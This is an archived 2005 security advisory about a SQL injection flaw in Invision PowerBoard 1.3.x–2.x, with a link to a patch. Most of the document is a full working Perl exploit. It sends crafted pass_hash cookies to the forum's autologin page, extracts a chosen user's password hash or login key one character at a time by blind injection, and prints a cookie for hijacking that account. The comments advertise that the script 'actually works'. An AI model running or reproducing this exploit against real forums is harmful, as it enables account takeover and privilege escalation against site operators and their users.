[HSC Security Group] Invision PowerBoard 1.3.x - 2-x Exploit and Patch

2005-07-17T00:00:00
ID SECURITYVULNS:DOC:9206
Type securityvulns
Reporter Securityvulns
Modified 2005-07-17T00:00:00

Description

Hackers Center Security Group (http://www.hackerscenter.com/) Zinho's Security Advisory

Desc: Invision PowerBoard 1.3.x - 2.x Privilege escalation through SQL injection Risk: High

hacky0u from http://www.h4cky0u.org kindly reported to me an exploit working against 1.3.x and 2.x versions of Invision Power board.

I've coded a quickfix to patch it: http://www.hackerscenter.com/archive/view.asp?id=3812

This is the exploit (Full credit to h4cky0u for it):

!/usr/bin/perl -w

This one actually works :) Just paste the outputted cookie into

your request header using livehttpheaders or something and you

will probably be logged in as that user. No need to decrypt it!

Exploit coded by "ReMuSOMeGa & Nova" and http://www.h4cky0u.org

use LWP::UserAgent;

$ua = new LWP::UserAgent; $ua->agent("Mosiac 1.0" . $ua->agent);

if (!$ARGV[0]) {$ARGV[0] = '';} if (!$ARGV[3]) {$ARGV[3] = '';}

my $path = $ARGV[0] . '/index.php?act=Login&CODE=autologin'; my $user = $ARGV[1]; # userid to jack my $iver = $ARGV[2]; # version 1 or 2 my $cpre = $ARGV[3]; # cookie prefix my $dbug = $ARGV[4]; # debug?

if (!$ARGV[2]) { print "..By ReMuSoMeGa & Nova. Usage: ipb.pl http://forums.site.org [id] [ver 1/2]. "; exit; }

my @charset = ("0","1","2","3","4","5","6","7","8","9","a","b","c","d","e","f");

my $outputs = '';

for( $i=1; $i < 33; $i++ ) { for( $j=0; $j < 16; $j++ ) { my $current = $charset[$j]; my $sql = ( $iver < 2 ) ? "99%2527+OR+(id%3d$user+AND+MID(password,$i,1)%3d%2527$current%2527)/" : "99%2527+OR+(id%3d$user+AND+MID(member_login_key,$i,1)%3d%2527$current%2527)/"; my @cookie = ('Cookie' => $cpre . "member_id=31337420; " . $cpre . "pass_hash=" . $sql); my $res = $ua->get($path, @cookie);

If we get a valid sql request then this

does not appear anywhere in the sources

$pattern = '<title>(.)Log In(.)</title>';

$_ = $res->content;

if ($dbug) { print };

if ( !(/$pattern/) ) { $outputs .= $current; print "$current "; last; }

} if ( length($outputs) < 1 ) { print "Not Exploitable! "; exit; } } print "Cookie: " . $cpre . "member_id=" . $user . ";" . $cpre . "pass_hash=" . $outputs; exit;

www.h4cky0u.org